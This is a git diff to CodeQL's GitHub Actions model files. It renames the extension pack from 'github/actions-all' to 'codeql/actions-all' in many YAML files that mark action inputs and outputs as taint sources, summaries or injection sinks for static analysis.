diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml
index c8d5e822c02..17aaecf80c5 100644
--- a/ql/lib/ext/manual/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/manual/haya14busa_action-cond.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml
index 5c7ec5f957f..60a68ed2f8d 100644
--- a/ql/lib/ext/manual/hexlet_project-action.model.yml
+++ b/ql/lib/ext/manual/hexlet_project-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
index 5384571801c..3c0820b6878 100644
--- a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
index ba5de742701..99146ff21be 100644
--- a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
index ce0fb573493..7790454a934 100644
--- a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml
index 8f53dfeb118..e3cea2e555a 100644
--- a/ql/lib/ext/manual/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/manual/iterative_setup-cml.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml
index 6d7d368c781..c3346d68945 100644
--- a/ql/lib/ext/manual/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/manual/iterative_setup-dvc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
index 9b0f078d874..2e2c0cff0ef 100644
--- a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
index dabec4e8d21..97b631cdfcd 100644
--- a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
index 2db040a0709..c6d3c5cfb48 100644
--- a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml
index e8d4aa790a6..697189cfbd0 100644
--- a/ql/lib/ext/manual/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/manual/jsdaniell_create-json.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
index 3a5cf8c8be2..7f82a8b74f5 100644
--- a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
+++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/jsmith/changes-since-last-tag
diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
index 8fde3e0c110..95bd63fb22e 100644
--- a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
index e9b04f2806f..1fc8b037530 100644
--- a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
index 3e646e4482f..40b8b093957 100644
--- a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
+++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
index 0d4df5ef6b1..0c3cf006d3e 100644
--- a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
+++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/karpikpl/list-changed-files-action
diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
index 386baaf2f95..e61008f160e 100644
--- a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml
index 5e7374dabad..96e4e8f02f5 100644
--- a/ql/lib/ext/manual/knu_changed-files.model.yml
+++ b/ql/lib/ext/manual/knu_changed-files.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/knu/changed-files
diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
index d9c7d33c86f..feff62d16c0 100644
--- a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
index 016a8ebc8cf..b74e721e577 100644
--- a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
index d358aa23893..d59a122a53f 100644
--- a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
index a437dc2c4f2..8e108765b40 100644
--- a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
+++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"]
diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
index f37bcbd6297..6f66e6cf867 100644
--- a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
index c7474549fcb..acdc250e353 100644
--- a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
+++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
index 05acda9aac9..69298631c6e 100644
--- a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml
index 4b0c810d230..85631268af7 100644
--- a/ql/lib/ext/manual/magefile_mage-action.model.yml
+++ b/ql/lib/ext/manual/magefile_mage-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml
index acdf3ead4a4..18dbcab6f53 100644
--- a/ql/lib/ext/manual/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/manual/maierj_fastlane-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
index b138d59c57e..5c3b4b82bc2 100644
--- a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml
index 63b236f32ad..d86870f2f15 100644
--- a/ql/lib/ext/manual/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/manual/marocchino_on_artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
index 9d0ecf04c6b..06b1f3afd5d 100644
--- a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
+++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/martinhaintz/ga-file-list
diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml
index 0c6debc5d5e..1d0e33bb277 100644
--- a/ql/lib/ext/manual/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/manual/mattdavis0351_actions.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
 - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
index b72bd69e625..f08bf9ac6e0 100644
--- a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
index fec2376377e..4e0800281d2 100644
--- a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
index 3201ac370b4..4ea7e022cbd 100644
--- a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml
index 35aecbdd968..b16fa3c545b 100644
--- a/ql/lib/ext/manual/mikefarah_yq.model.yml
+++ b/ql/lib/ext/manual/mikefarah_yq.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
index 59c6e39515e..09a9673ee89 100644
--- a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
index 06371eebae2..d3b34019844 100644
--- a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml
index a12a478d9bd..59cf5d2cf02 100644
--- a/ql/lib/ext/manual/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/manual/msys2_setup-msys2.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
index 28357d5f468..4664937e6bc 100644
--- a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
index cfdff1898ae..28dd99378bf 100644
--- a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
index f4ad5f7292b..7ca3034593b 100644
--- a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml
index 872b4e243d7..8af1107d686 100644
--- a/ql/lib/ext/manual/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/manual/nanasess_setup-php.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml
index bd53ab3d65a..86c0bb7ccfb 100644
--- a/ql/lib/ext/manual/nick-fields_retry.model.yml
+++ b/ql/lib/ext/manual/nick-fields_retry.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml
index db650eeb7c7..df140b9e570 100644
--- a/ql/lib/ext/manual/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/manual/octokit_graphql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml
index 34d63f31ca8..f0f684aa4ca 100644
--- a/ql/lib/ext/manual/octokit_request-action.model.yml
+++ b/ql/lib/ext/manual/octokit_request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
index 02d6d804699..8149f79fa64 100644
--- a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
index 46fb5fd7dd6..4f2b95eac61 100644
--- a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
index d1d930168dc..8abafc6ae7d 100644
--- a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
+++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"]
diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
index 0aab8b94632..f0dcfa3ea4e 100644
--- a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
index 62bb26ba1ff..2268d00d332 100644
--- a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
+++ b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
index 14bd9a7875a..ab55b9b6214 100644
--- a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
+++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"]
diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
index dfacbbc14f4..1ec53228c16 100644
--- a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
index 0acee71af26..97564731d2c 100644
--- a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
+++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"]
diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
index b258b619b6c..b43c1327657 100644
--- a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
